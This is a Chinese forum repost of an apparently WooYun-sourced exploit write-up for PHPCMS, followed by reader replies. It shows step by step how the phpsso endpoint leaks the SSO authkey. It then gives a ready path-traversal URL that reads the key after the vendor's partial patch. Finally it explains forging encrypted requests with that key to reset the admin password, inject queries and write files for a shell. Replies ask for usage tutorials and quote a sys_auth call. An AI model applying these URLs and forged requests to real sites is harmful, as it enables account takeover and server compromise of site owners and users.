PHPCMS最新版本authkey泄露可注射拿shell

凡火火。

本文于2015年4月12日清晨转自乌云漏洞平台 截稿时乌云漏洞状态为细节向第三方安全合作伙伴开放

---我是火火可爱的分割线---

安装phpcms的时候会强制安装它的通行证。
phpcms/phpsso_server/phpcms/modules/phpsso/index.php里有一段很可怕的代码

1. /**
   
2.          * 获取应用列表
   
3.          */
   
4.         public function getapplist() {
   
5.                 $applist = getcache('applist', 'admin');
   
6.                 exit(serialize($applist));
   
7.         }
   

复制代码

cache里是什么内容呢，我们自己去看一下文件：

1. <?php
   
2. return array (
   
3.   1 =>
   
4.   array (
   
5.     'appid' => '1',
   
6.     'type' => 'phpcms_v9',
   
7.     'name' => 'phpcms v9',
   
8.     'url' => 'http://localhost:8038/study/phpcms/',
   
9.     'authkey' => 'L7UXO1cpUV6QmkX0oeGAXiOdQy6Hmvkr',
   
10.     'ip' => '',
    
11.     'apifilename' => 'api.php?op=phpsso',
    
12.     'charset' => 'gbk',
    
13.     'synlogin' => '1',
    
14.   ),
    
15. );
    
16. ?>

复制代码

所以只要我们调用phpsso并且能走到这个方法里，就会突出sso配置的客户端的所有信息，包括authkey。
查看通行证代码发现，只要$_POST['data']可以解出来，就可以走下去。

1. if(isset($_GET) && is_array($_GET) && count($_GET) > 0) {
   
2.                         foreach($_GET as $k=>$v) {
   
3.                                 if(!in_array($k, array('m','c','a'))) {
   
4.                                         $_POST[$k] = $v;
   
5.                                 }
   
6.                         }
   
7.                 }

复制代码

GET全付给POST

1. if(isset($_POST['data'])) {
   
2.                         parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
   
3.                                        
   
4.                         if(empty($this->data) || !is_array($this->data)) {
   
5.                                 exit('0');
   
6.                         }
   
7.                 } else {
   
8.                         exit('0');
   
9.                 }

复制代码

ok，我们怎么拿到这个$_POST['data']，用户上传头像的页面里就有。

注册登录后访问

http://localhost:8038/study/phpcms/index.php?m=member&c=index&a=account_manage_avatar&t=1

查看源文件：

拿到这个：

1. aHR0cDovL2xvY2FsaG9zdDo4MDM4L3N0dWR5L3BocGNtcy9waHBzc29fc2VydmVyL2luZGV4LnBocD9tPXBocHNzbyZjPWluZGV4JmE9dXBsb2FkYXZhdGFyJmF1dGhfZGF0YT12PTEmYXBwaWQ9MSZkYXRhPWU1YzJWQU1HVVFaUkFRa0lVUVFLVndGVUFnSUNWZ0FJQWxkVkJRRkREUVZjVjBNVVFHa0FReFZaWmxNRUdBOSUyQkRqWm9LMUFIUm1Vd0JHY09YVzVVRGdRaEpEeGFlUVZuR0FkeFZSY0tRQQ==

复制代码

解除base64_decode编码得

1. http://localhost:8038/study/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9%2BDjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA

复制代码

将url里的uploadavatar换成：getapplist得：

1. http://localhost:8038/study/phpcms/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9%2BDjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQA

复制代码

访问得：

1. a:1:{i:1;a:9:{s:5:"appid";s:1:"1";s:4:"type";s:9:"phpcms_v9";s:4:"name";s:9:"phpcms v9";s:3:"url";s:35:"http://localhost:8038/study/phpcms/";s:7:"authkey";s:32:"L7UXO1cpUV6QmkX0oeGAXiOdQy6Hmvkr";s:2:"ip";s:0:"";s:11:"apifilename";s:17:"api.php?op=phpsso";s:7:"charset";s:3:"gbk";s:8:"synlogin";s:1:"1";}}

复制代码

和我们想的一样，authkey在里面：

1. s:7:"authkey";s:32:"L7UXO1cpUV6QmkX0oeGAXiOdQy6Hmvkr"

复制代码

拿到这个key已经可以想做什么想什么了，sso体系里的东西都可以做了。



举个例子：

1. /phpcms/phpsso_server/phpcms/modules/phpsso/index.php
   
2. 
   
3. 内：
   
4. 
   
5. public function uploadavatar()
   
6. 
   
7. 写的
   
8. 
   
9. 
   
10. 
    
11. $this->uid = $this->data['uid']; //uid来自解密出来的uid
    
12. 
    
13. $this->avatardata = $this->data['avatardata']; //数据内容来自解密出来的数据内容
    
14. 
    
15. 
    
16. 
    
17. ……
    
18. 
    
19. 
    
20. 
    
21. $dir = $avatarfile.$dir1.'/'.$dir2.'/'.$this->uid.'/';
    
22. 
    
23. 
    
24. 
    
25. //目录名里引用了来自解密内容的uid
    
26. 
    
27. 
    
28. 
    
29. ……
    
30. 
    
31. $filename = $dir.'180x180.jpg';
    
32. 
    
33. //文件名又来自引用了解密uid内容的$dir变量
    
34. 
    
35. $fp = fopen($filename, 'w');
    
36. 
    
37. fwrite($fp, $this->avatardata);
    
38. 
    
39. fclose($fp);

复制代码

文件写入了，反正是想做什么做什么。



可是……在厂商默默的忽略之后又偷偷的发了小补丁。。。
其中这个点

1. public function getapplist() {
   
2.                 $applist = getcache('applist', 'admin');
   
3.                 exit(serialize($applist));
   
4.         }

复制代码

修复为

1. public function getapplist() {
   
2.                 $applist = getcache('applist', 'admin');
   
3.                 foreach($applist as $key=>$value){
   
4.                         unset($applist[$key]['authkey']);
   
5.                 }
   
6.                 exit(serialize($applist));

复制代码

修复得很不仔细，看来厂商真的觉得这不是个洞。好啊，那么肯定就会有其它点了，既然不重视这个点，我们来看\api\get_menu.php:

1. function ajax_getlist() {
   
2. 
   
3.         $cachefile = $_GET['cachefile'];
   
4.         $cachefile = str_replace(array('/', '//'), '', $cachefile);
   
5.         //$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $cachefile);
   
6.         $path = $_GET['path'];
   
7.         $path = str_replace(array('/', '//'), '', $path);
   
8.         //$path = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $path);
   
9.         $title = $_GET['title'];
   
10.         $key = $_GET['key'];
    
11.         $infos = getcache($cachefile,$path);
    
12.         $where_id = intval($_GET['parentid']);
    
13.         $parent_menu_name = ($where_id==0) ? '' : trim($infos[$where_id][$key]);
    
14.         foreach($infos AS $k=>$v) {
    
15.                 if($v['parentid'] == $where_id) {
    
16.                         if ($v['parentid']) $parentid = $infos[$v['parentid']]['parentid'];
    
17.                         $s[]=iconv(CHARSET,'utf-8',$v['catid'].','.trim($v[$key]).','.$v['parentid'].','.$parent_menu_name.','.$parentid);
    
18.                 }
    
19.         }
    
20.         if(count($s)>0) {
    
21.                 $jsonstr = json_encode($s);
    
22.                 echo trim_script($_GET['callback']).'(',$jsonstr,')';
    
23.                 exit;                       
    
24.         } else {
    
25.                 echo trim_script($_GET['callback']).'()';exit;                       
    
26.         }
    
27. }

复制代码

其中的getcache的两个参量是可控的。并且没有过滤反斜杠。构造合适的访问链接可以访问到cache文件夹中的配置文件，并读取内容。

那么如果这样的链接会督导什么内容呢？

1. http://www.test.org/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin

复制代码

继续往下看
在\phpsso_server\phpcms\modules\phpsso\index.php中含有如下函数：

1. public function edit() {
   
2.                 $this->email = isset($this->data['email']) ? $this->data['email'] : '';
   
3.                 $this->uid = isset($this->data['uid']) ? $this->data['uid'] : '';
   
4. 
   
5.                 $userinfo = $this->getuserinfo(1);
   
6.                
   
7.                 if (isset($this->data['password']) && !empty($this->data['password'])) {
   
8.                         $this->password = create_password($this->data['password'], $userinfo['random']);
   
9.                 }
   
10.                
    
11.                 $this->random = !empty($this->data['random']) ? $this->data['random'] : $userinfo['random'];
    
12.                 if (isset($this->data['newpassword']) && !empty($this->data['newpassword'])) {
    
13.                         $this->newpassword = create_password($this->data['newpassword'], $this->random);
    
14.                 }
    
15. 
    
16.                 if ($userinfo == -1) {
    
17.                         exit('-1');
    
18.                 }
    
19. 
    
20.                 if (isset($this->password) && !empty($this->password) && $userinfo['password'] != $this->password) {
    
21.                         exit('-2');
    
22.                 }
    
23. 
    
24.                 if ($this->email && $userinfo['email'] != $this->email) {
    
25.                         if($this->checkemail(1) == -1) exit('-3');
    
26.                 }       
    
27.                
    
28.                 $data = array();
    
29.                 $data['appname'] = $this->applist[$this->appid]['name'];
    
30.                
    
31.                 if (!empty($this->email) && $userinfo['email'] != $this->email) {
    
32.                         $data['email'] = $this->email;
    
33.                 }
    
34. 
    
35.                 if (isset($this->newpassword) && $userinfo['password'] != $this->newpassword) {
    
36.                         $data['password'] = $this->newpassword;
    
37.                         $data['random'] = $this->random;
    
38.                 }
    
39. 
    
40.                 if (!empty($data)) {
    
41.                        
    
42.                         //ucenter部份
    
43.                         if ($this->config['ucuse']) {
    
44.                                 pc_base::load_config('uc_config');
    
45.                                 require_once PHPCMS_PATH.'api/uc_client/client.php';
    
46.                                 $r = uc_user_edit($userinfo['username'], '', (isset($this->data['newpassword']) && !empty($this->data['newpassword']) ? $this->data['newpassword'] : ''), $data['email'],1);
    
47.                                 if ($r != 1) {
    
48.                                  //{-1:用户不存在;-2:旧密码错误;-3:email已经存在 ;1:成功;0:未作修改}
    
49.                                         switch ($r) {
    
50.                                                 case '-1':
    
51.                                                         exit('-2');
    
52.                                                 break;
    
53.                                                 case '0':                               
    
54.                                                 case '-4':                                               
    
55.                                                 case '-5':                                               
    
56.                                                 case '-6':
    
57.                                                 case '-7':
    
58.                                                 case '-8':
    
59.                                                         exit('0');
    
60.                                                 break;
    
61.                                         }
    
62.                                 }
    
63.                         }
    
64.                         if (empty($data['email'])) unset($data['email']);
    
65.                
    
66.                         /*插入消息队列*/
    
67.                         $noticedata = $data;
    
68.                         $noticedata['uid'] = $userinfo['uid'];
    
69.                         messagequeue::add('member_edit', $noticedata);
    
70.                         if($this->username) {
    
71.                                 $res = $this->db->update($data, array('username'=>$this->username));
    
72.                         } else {
    
73.                                 $res = $this->db->update($data, array('uid'=>$this->uid));
    
74.                         }
    
75.                         exit("$res");
    
76.                 } else {
    
77.                         exit('0');
    
78.                 }
    
79.         }

复制代码

里面有数据库的操作，应该是用于密码更改的。我们来构造一个data数据，加密前：
uid=1&newpassword=admin123456
利用上面的authkey以及cms自带的加解密函数即可进行加密。在这里，我们除了可以修改密码，还可以进行注入.
我只是大自然的搬运工。

C4r1st

昨天晚上捧着手机在床上看了半天，现在再来重新看一遍、

黑咖啡

学习了！

风之琳

楼主，能做一个教程么？看不懂

2863482451

直接来个怎么利用多啊好。一直没怎么看懂

埃辛

为什么按照你的操作进行 返回零呢 ，搞不明白了

埃辛

我这样说正确的吗 sys_auth('uid=1&newpassword=admin123456','ENCODE','BnT5xx7Sxgma8B9hvHC6RTUkPOdbFRHO')  加密后  然后 访问 /index.php?m=phpsso&c=index&a=edit&data=加密字符串 ？   不成功 肯定哪里出了问题 能不能不吝指教下   

H.U.C—Prince

支持中国红客联盟(ihonker.org)

admin1964

支持中国红客联盟(ihonker.org)

Jack-5

学习学习技术，加油！